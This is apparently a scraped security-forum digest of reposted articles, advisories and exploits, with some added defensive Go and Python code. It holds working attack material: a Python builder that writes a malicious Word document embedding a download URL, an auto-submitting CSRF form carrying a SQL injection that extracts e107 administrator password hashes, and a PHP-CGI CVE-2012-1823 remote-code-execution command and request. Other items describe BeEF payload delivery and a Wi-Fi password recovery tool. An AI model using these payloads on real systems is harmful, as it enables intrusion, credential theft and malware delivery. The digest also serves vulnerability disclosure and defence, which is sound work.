"\x5C\x73\x73\x65\x6D\x69\x68\x69\x64\x64\x65\x6E\x20\x4E\x6F\x72" "\x6D\x61\x6C\x20\x54\x61\x62\x6C\x65\x3B\x7D\x7D\x0D\x0A\x7B\x5C" "\x2A\x5C\x6C\x61\x74\x65\x6E\x74\x73\x74\x79\x6C\x65\x73\x5C\x6C" 
"\x73\x64\x73\x74\x69\x6D\x61\x78\x31\x35\x36\x5C\x6C\x73\x64\x6C" "\x6F\x63\x6B\x65\x64\x64\x65\x66\x30\x7D\x7B\x5C\x2A\x5C\x72\x73" "\x69\x64\x74\x62\x6C\x20\x5C\x72\x73\x69\x64\x31\x35\x38\x30\x37" "\x35\x31\x39\x7D\x7B\x5C\x2A\x5C\x67\x65\x6E\x65\x72\x61\x74\x6F" "\x72\x20\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x57\x6F\x72\x64" "\x20\x31\x31\x2E\x30\x2E\x30\x30\x30\x30\x3B\x7D\x7B\x5C\x69\x6E" "\x66\x6F\x7B\x5C\x74\x69\x74\x6C\x65\x20\x46\x66\x66\x66\x66\x66" "\x66\x66\x66\x7D\x7B\x5C\x61\x75\x74\x68\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x6F\x70\x65\x72\x61\x74\x6F\x72\x20\x55\x53\x45" "\x52\x7D\x7B\x5C\x63\x72\x65\x61\x74\x69\x6D\x5C\x79\x72\x32\x30" "\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C\x68\x72\x31\x34" "\x5C\x6D\x69\x6E\x35\x30\x7D\x7B\x5C\x72\x65\x76\x74\x69\x6D\x5C" "\x79\x72\x32\x30\x31\x31\x5C\x6D\x6F\x34\x5C\x64\x79\x31\x32\x5C" "\x68\x72\x31\x34\x5C\x6D\x69\x6E\x35\x31\x7D\x7B\x5C\x76\x65\x72" "\x73\x69\x6F\x6E\x31\x7D\x0D\x0A\x7B\x5C\x65\x64\x6D\x69\x6E\x73" "\x31\x7D\x7B\x5C\x6E\x6F\x66\x70\x61\x67\x65\x73\x31\x7D\x7B\x5C" "\x6E\x6F\x66\x77\x6F\x72\x64\x73\x31\x7D\x7B\x5C\x6E\x6F\x66\x63" "\x68\x61\x72\x73\x39\x7D\x7B\x5C\x2A\x5C\x63\x6F\x6D\x70\x61\x6E" "\x79\x20\x43\x48\x49\x4E\x41\x7D\x7B\x5C\x6E\x6F\x66\x63\x68\x61" "\x72\x73\x77\x73\x39\x7D\x7B\x5C\x76\x65\x72\x6E\x32\x34\x36\x31" "\x33\x7D\x7B\x5C\x2A\x5C\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x30" "\x30\x30\x30\x30\x30\x30\x30\x7D\x7D\x7B\x5C\x2A\x5C\x78\x6D\x6C" "\x6E\x73\x74\x62\x6C\x20\x7B\x5C\x78\x6D\x6C\x6E\x73\x31\x20\x68" "\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x6D\x69" "\x63\x72\x6F\x73\x6F\x66\x74\x2E\x63\x6F\x6D\x2F\x6F\x66\x66\x69" "\x63\x65\x2F\x77\x6F\x72\x64\x2F\x32\x30\x30\x33\x2F\x77\x6F\x72" "\x64\x6D\x6C\x7D\x7D\x0D\x0A\x5C\x70\x61\x70\x65\x72\x77\x31\x31" "\x39\x30\x36\x5C\x70\x61\x70\x65\x72\x68\x31\x36\x38\x33\x38\x5C" "\x6D\x61\x72\x67\x6C\x31\x38\x30\x30\x5C\x6D\x61\x72\x67\x72\x31" 
[hex-encoded header and footer byte strings of the document creator script omitted]
url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document
-
[h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM
-
[h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple of major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected "an unauthorized digital certificate for the '*.google.com' domain" late on the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused to fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but also including known CA fixes from the recent past. This list of Google properties is fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.youtube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion.
The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are affected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly affect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group.
It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. © Aralık 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist
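As an added example, not code from the Securelist article or from any of the vendors named in it, the Go program below rebuilds the pattern of the incident with a throw-away hierarchy and shows the two defender-side controls the article's story implies: an issuance-time audit that flags a CA certificate shaped like a server certificate with no CRL/OCSP pointers, and a per-certificate distrust list applied on top of normal path validation, which is how an intermediate can be "untrusted" without pulling the root. All names are constructed, and keying the distrust list on a SHA-256 fingerprint is an assumption; the article does not say how the vendor releases identify the certificates.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"errors"
	"math/big"
	"time"
)

type certKey struct {
	cert *x509.Certificate
	key  ed25519.PrivateKey
}

// issue creates a one-day certificate for cn with the given SANs, signed by
// parent (self-signed when parent is nil); ca sets basicConstraints CA:TRUE.
func issue(serial int64, cn string, ca bool, names []string, parent *certKey) (*certKey, error) {
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn},
		DNSNames:     names,
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	if ca {
		tmpl.IsCA, tmpl.BasicConstraintsValid = true, true
		tmpl.KeyUsage |= x509.KeyUsageCertSign
	}
	pub, key, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	parentCert, signer := tmpl, key
	if parent != nil {
		parentCert, signer = parent.cert, parent.key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parentCert, pub, signer)
	if err != nil {
		return nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return &certKey{cert: cert, key: key}, err // cert is nil when err is set
}

// BuildScenario mirrors the incident with constructed names: a root, a subscriber
// certificate issued with CA:TRUE and no CRL/OCSP pointers, and a server
// certificate that subscriber then signs for a name it should never vouch for.
func BuildScenario() (root, sub, leaf *certKey, err error) {
	if root, err = issue(1, "Constructed Root CA", true, nil, nil); err == nil {
		if sub, err = issue(2, "*.subscriber.example", true, []string{"*.subscriber.example"}, root); err == nil {
			leaf, err = issue(3, "www.victim.example", false, []string{"www.victim.example"}, sub)
		}
	}
	return
}

// Fingerprint is the SHA-256 of the DER encoding (assumed key of a distrust list).
func Fingerprint(c *x509.Certificate) string {
	sum := sha256.Sum256(c.Raw)
	return hex.EncodeToString(sum[:])
}

// AuditSubordinate lists what should have stopped a subordinate CA certificate
// at issuance review; self-signed roots and end-entity certificates yield nil.
func AuditSubordinate(c *x509.Certificate) (findings []string) {
	if !c.IsCA || c.CheckSignatureFrom(c) == nil {
		return nil
	}
	if len(c.DNSNames) > 0 {
		findings = append(findings, "CA:TRUE on a certificate that carries server DNS names")
	}
	if len(c.CRLDistributionPoints) == 0 && len(c.OCSPServer) == 0 {
		findings = append(findings, "no CRL distribution point or OCSP responder: clients cannot learn of revocation")
	}
	return findings
}

// VerifyWithDistrust runs ordinary path validation and then rejects any chain
// that passes through a distrusted certificate, cutting off an intermediate
// without removing the root it hangs from, as the vendor releases above do.
func VerifyWithDistrust(leaf *x509.Certificate, inters, roots *x509.CertPool, distrusted map[string]bool) error {
	chains, err := leaf.Verify(x509.VerifyOptions{Roots: roots, Intermediates: inters})
	if err != nil {
		return err
	}
	for _, chain := range chains {
		clean := true
		for _, c := range chain {
			clean = clean && !distrusted[Fingerprint(c)]
		}
		if clean {
			return nil
		}
	}
	return errors.New("every candidate chain passes through a distrusted certificate")
}
```

Ordinary validation accepts the chain, which is exactly why the audit and the distrust list are needed; the audit catches the mistake before issuance, the distrust list after.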
-
Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit
There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly.
A. What a browser exploit kit is, and what it isn't
   It only does exploits
   Directing victims to the exploits is out of scope
      Usually done with spam or iframe injections
   The actual malware installed is out of scope too
   Where the exploit kit is hosted is also quite variable
B. Timeline
   Version 1.0.0 - September 2010
      i. It's not that different from other exploit kits
   Version 1.0.1
   Version 1.0.2 - November 2010
      i. Changelog
      ii. Leaked in May 2011
   Version 1.1.0 - December 2010
      i. Changelog
   Version 1.2.0 - August 2011
      i. Changelog
   Version 1.2.1 - December 2011
   Version 1.2.2
      i. Cryptome "Virus"
   Version 1.2.3 - March 2012
   Version 1.2.4 - June 2012
      i. CVE-2012-1723
      ii. CVE-2011-2110
   Version 1.2.5 - July 2012
      i. CVE-2012-1889
      ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm'
   August 2012
      i. CVE-2012-4681
   Version 2.0.0 - September 2012
      i. Changelog
      ii. The official announcement isn't entirely true.
C. The "Free Version"
   Pulled from a system with C99 Shell
   IonCube "copy protection"
   How to break IonCube obfuscation
   Analysis of PHP Source Code
D. Open Source Code in use
   PluginDetect
   MaxMind GeoIP
   etc.
E. The Exploits
   CVE-2010-0188
   etc. etc. etc. as time allows
X. There is almost no change in the exploits themselves from one version of the exploit kit to the next.
Y. Curious clues about the possible authorship of some exploits
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit
-
Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using the BeEF Browser Exploitation Framework and the Java Payload module. In the BeEF framework there is a module called Java Payload under local exploits; we are going to use that module to exploit the Windows 7 system. So, first you need to hook the browser and then use that module. The victim will get the Java pop-up; if he clicks OK you will get the meterpreter shell after some time. Note: getting the session takes some time, so be patient. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation
-
[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. 
Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntarily publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Sursa: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia
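The article's root cause is pages that can be loaded in an attacker's frame because they send no X-Frame-Options or equivalent. As an added example (my code, not the researcher's or Softpedia's), here is a Go audit function that classifies a response's framing protection from its headers, including the cases that trip people up: CSP frame-ancestors overriding X-Frame-Options, a wildcard frame-ancestors that protects nothing, the ALLOW-FROM value that Chrome and Safari never supported, and conflicting duplicate headers. The header sets in Samples are constructed, not captured from any site named in the article.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// FramingVerdict records whether a response forbids cross-origin framing and why.
type FramingVerdict struct {
	Protected bool
	Mechanism string // "csp", "x-frame-options" or "none"
	Note      string
}

// AssessFraming decides from response headers whether a page can be loaded in an
// attacker-controlled frame. A CSP frame-ancestors directive takes precedence over
// X-Frame-Options in browsers that implement it, so it is checked first.
func AssessFraming(h http.Header) FramingVerdict {
	for _, policy := range h.Values("Content-Security-Policy") {
		for _, directive := range strings.Split(policy, ";") {
			f := strings.Fields(directive)
			if len(f) == 0 || !strings.EqualFold(f[0], "frame-ancestors") {
				continue
			}
			sources := f[1:]
			// An empty source list matches nothing, the same as 'none'.
			if len(sources) == 0 || (len(sources) == 1 && strings.EqualFold(sources[0], "'none'")) {
				return FramingVerdict{true, "csp", "frame-ancestors 'none'"}
			}
			for _, s := range sources {
				// "*" or a bare scheme admits every origin using that scheme.
				if s == "*" || s == "http:" || s == "https:" {
					return FramingVerdict{false, "csp", "frame-ancestors admits arbitrary origins: " + s}
				}
			}
			return FramingVerdict{true, "csp", "frame-ancestors limited to " + strings.Join(sources, " ")}
		}
	}
	xfo := h.Values("X-Frame-Options")
	switch {
	case len(xfo) == 0:
		return FramingVerdict{false, "none", "neither X-Frame-Options nor frame-ancestors is set"}
	case len(xfo) > 1:
		return FramingVerdict{false, "x-frame-options", "multiple X-Frame-Options values; treat as unprotected and send one"}
	}
	v := strings.ToUpper(strings.TrimSpace(xfo[0]))
	switch {
	case v == "DENY" || v == "SAMEORIGIN":
		return FramingVerdict{true, "x-frame-options", v}
	case strings.HasPrefix(v, "ALLOW-FROM"):
		return FramingVerdict{false, "x-frame-options", "ALLOW-FROM is ignored by Chrome and Safari; use frame-ancestors"}
	}
	return FramingVerdict{false, "x-frame-options", "unrecognised value " + v}
}

// Samples returns constructed header sets covering the cases above.
func Samples() map[string]http.Header {
	mk := func(kv ...string) http.Header {
		h := http.Header{}
		for i := 0; i+1 < len(kv); i += 2 {
			h.Add(kv[i], kv[i+1])
		}
		return h
	}
	return map[string]http.Header{
		"unprotected":   mk(),
		"xfo-deny":      mk("X-Frame-Options", "DENY"),
		"xfo-allowfrom": mk("X-Frame-Options", "ALLOW-FROM https://partner.example"),
		"xfo-conflict":  mk("X-Frame-Options", "SAMEORIGIN", "X-Frame-Options", "DENY"),
		"csp-none":      mk("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
		"csp-wildcard":  mk("Content-Security-Policy", "frame-ancestors *", "X-Frame-Options", "DENY"),
		"csp-self":      mk("Content-Security-Policy", "frame-ancestors 'self' https://app.example"),
	}
}

func main() {
	for name, h := range Samples() {
		fmt.Printf("%-14s %+v\n", name, AssessFraming(h))
	}
}
```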
-
I knew it was a macro, but I didn't know how it was defined, and after a little searching: WinBase.h #define ZeroMemory RtlZeroMemory RtlZeroMemory is defined in WDH.h: #define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) Apparently it's the same thing. It is likely, however, that there are small differences in the call: "memset" will probably call the wrapper from the Visual C runtime, while the ZeroMemory call may be executed directly in the kernel (RtlZeroMemory routine (Windows Drivers)). I'll do a bit of research to check.
-
[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session.
We cover these commands:
!address -summary
!address <addr>
!vprot <addr>
!mapped_file <addr>
Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution.
Resources:
Microsoft Windows SDK for Windows 7 and .NET Framework 4
Sysinternals VMMap
Performance and Memory Consumption Under WOW64
MEMORY_BASIC_INFORMATION structure
Memory Protection Constants
Timeline:
[00:50] - Live Debug of Notepad
[01:10] - VMMap of Notepad
[02:08] - Virtual Address Space summary (!address -summary)
[04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB
[08:11] - Memory Mapped Files
[10:11] - Memory Type, State and Protection (inc. Guard Pages)
[21:22] - Allocation Base vs. Base Address (!address <addr>)
[26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>)
[29:14] - Mapped Files (!mapped_file <addr>)
Sursa: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9
-
NFC - NEAR FIELD COMMUNICATION Subho Halder and Aditya Gupta ........................................................ INTRODUCTION Near Field Communication at a glance. What is NFC? NFC or Near Field Communication is a set of standards or protocols for communication between two devices, by either touching them or bringing them into close proximity (less than 4 cm). The communication protocols of such devices are based on RFID standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded in 2004 by major companies such as Sony, Nokia, Philips and Samsung. The operating frequency of such communication is merely 13.56 MHz (+/- 7), which is very low. This gives the advantage of easy integration into portable devices without the need for much battery power. Download: www.exploit-db.com/download_pdf/23826
-
[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h] MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection. Vulnerable code: /editpost.php === Line 398 === $posthash_query = "posthash='{$posthash}' OR "; === It can be done by using Tamper Data (or Live HTTP Headers), and when submitting a post, editing the 'posthash' POST parameter to your payload, submitting, then going to edit your post. Small "HOWTO" in picture: http://imgur.com/a/JxfEI This bug was not found by me, but afaik, I am the first one to release it. -- *Joshua Rogers* - Retro Game Collector && IT Security Specialist gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> Sursa: MyBB (editpost.php, posthash) SQL Injection Vulnerability
-
[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h]
# Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection
# Google Dork: intext:"This site is powered by e107"
# Date: 01/01/13
# Exploit Author: Joshua Reynolds
# Vendor Homepage: http://e107.org
# Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download
# Version: 1.0.2
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2012-6434
-----------------------------------------------------------------------------------------
Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download.
------------------------------------------------------------------------------------------
Exploit:
<html>
<body onload="document.formCSRF.submit();">
<form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create">
<input type="hidden" name="cat_id" value="1"/>
<input type="hidden" name="download_category" value="2"/>
<input type="hidden" name="download_name" value="adminpassdownload"/>
<input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/>
<input type="hidden" name="download_url_external" value=""/>
<input type="hidden" name="download_filesize_external" value=""/>
<input type="hidden" name="download_filesize_unit" value="KB"/>
<input type="hidden" name="download_author" value=""/>
<input type="hidden" name="download_author_email" value=""/>
<input type="hidden" name="download_author_website" value=""/>
<input type="hidden" name="download_description" value=""/>
<input type="hidden" name="download_image" value=""/>
<input type="hidden" name="download_thumb" value=""/>
<input type="hidden" name="download_datestamp" value=""/>
<input type="hidden" name="download_active" value="1"/>
<input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/>
<input type="hidden" name="download_comment" value="1"/>
<input type="hidden" name="download_visible" value="0"/>
<input type="hidden" name="download_class" value="0"/>
<input type="hidden" name="submit_download" value="Submit+Download"/>
</form>
</body>
</html>
------------------------------------------------------------------------------------------
Fix: This bug has been fixed in the following revision: r13058
------------------------------------------------------------------------------------------
Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family.
Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast Sursa: e107 v1.0.2 CSRF Resulting in SQL Injection
-
WiFi Password Decryptor

WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system.

It automatically recovers all types of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays the following information:

- WiFi Name (SSID)
- Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
- Password Type
- Password in clear text

After the successful recovery you can save the password list to an HTML/XML/TEXT file. You can also right click on any of the displayed accounts and quickly copy the password.

Under the hood, 'WiFi Password Decryptor' uses the System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it safer and more reliable. It also lets us have just a single EXE that works on both 32-bit & 64-bit platforms.

The new version 1.5 supports a command-line version, making it useful for automation & penetration testers. It has been successfully tested on Windows Vista and higher operating systems including Windows 8.

Features & Benefits

- Instantly decrypt and recover stored WiFi account passwords
- Recovers all types of Wireless Keys/Passwords (WEP/WPA/WPA2 etc)
- Command-line version for automation & penetration testers.
- Simple & elegant GUI interface makes it easy to use.
- Right click context menu to quickly copy the Password
- Sort feature to arrange the displayed passwords
- Save the recovered WiFi password list to HTML/XML/TEXT file.
- Integrated Installer for assisting you in local Installation & Uninstallation.

Details: http://securityxploded.com/wifi-password-decryptor.php
Download: http://securityxploded.com/download.php#wifipassworddecryptor
-
[h=1]Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823[/h]
by infodox

The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up, for several reasons. Primarily the massive misunderstanding of how it worked.

For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguments into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution.

Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell php.ini that it is to allow URL inclusion (allow_url_include = 1), and to automatically prepend the "file" php://input. This means whatever we send in the POST request is parsed as PHP, and executed.

One way to exploit this (targeting example.com), using lwp-request's "POST" utility, is as follows.

echo "<?php system('id');die(); ?>" | POST "http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

As you will see in the video, we can easily use this to execute commands remotely from a BASH shell. The HTTP request sent looks something similar to this:

POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: example.com
User-Agent: lwp-request/6.03 libwww-perl/6.04
Content-Length: 29
Content-Type: application/x-www-form-urlencoded

<?php system('id');die(); ?>

The response to that was the server sending back the result of our command (id), so we know it works.

So now we have a somewhat reliable "commandline" RCE method; however, we like to automate things... Let's see how hard it is to write a reliable exploit in Python. The following screenshot shows exploitation using Python.

Exploiting PHP-CGI bug with Python

So, we know now that using Python's requests library (a mainstay of all my exploits, as I guess you noticed). Now that we have reliable exploitation using Python, I decided to go a step further and write an actual exploit in Python to automate the whole thing. It simply drops you into a shell of sorts, giving you the ability to run commands as the web-user.

Exploit code available here: Google Code – Insecurety Research

So, along comes the demo, as usual in video format. This time, with additional tunes by Blackmail House, who gave me permission to use their music in demo videos the other day in the pub. Remember, play nice out there.

Sursa: Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823 | Insecurety Research
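As an added defensive example (not part of the original post or the Insecurety Research exploit), a log scanner that flags request lines carrying the CVE-2012-1823 pattern shown above. It assumes the CGI rule that a query string with no literal '=' is handed to php-cgi as command-line arguments, which is why the exploit encodes '=' as %3d; the access-log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2013:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2013:10:00:07 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 87
203.0.113.7 - - [01/Jan/2013:10:00:11 +0000] "GET /search.php?q=-d+anything HTTP/1.1" 200 100
203.0.113.8 - - [01/Jan/2013:10:00:15 +0000] "GET /page.php?plain+query HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# php.ini directives the request tries to override through php-cgi's -d option
DIRECTIVE_RE = re.compile(r"-d\s+([A-Za-z_.]+)")


def query_is_argv_style(raw_query: str) -> bool:
    """True when the raw query string would reach php-cgi as argv.

    Assumption (CGI spec): a query string without any literal '=' is split on
    '+' and passed as command-line arguments. The exploit above therefore
    encodes '=' as %3d; a normal '?page=1' query is never eligible.
    """
    if "=" in raw_query:
        return False
    words = unquote_plus(raw_query).split(" ")
    return any(w.startswith("-") for w in words)


def scan_log(text: str) -> list:
    """Return one dict per suspicious request: source IP, method, the
    decoded query and the php.ini directives it tries to set."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group("target"):
            continue
        raw_query = m.group("target").split("?", 1)[1]
        if not query_is_argv_style(raw_query):
            continue
        decoded = unquote_plus(raw_query)
        hits.append({
            "ip": line.split(" ", 1)[0],
            "method": m.group("method"),
            "decoded_query": decoded,
            "directives": DIRECTIVE_RE.findall(decoded),
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```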
-
Hack Android With Android Exploitation Framework

IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You will also come to see how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting other persons' computers/mobile devices with a malicious application without their permission is a punishable crime.

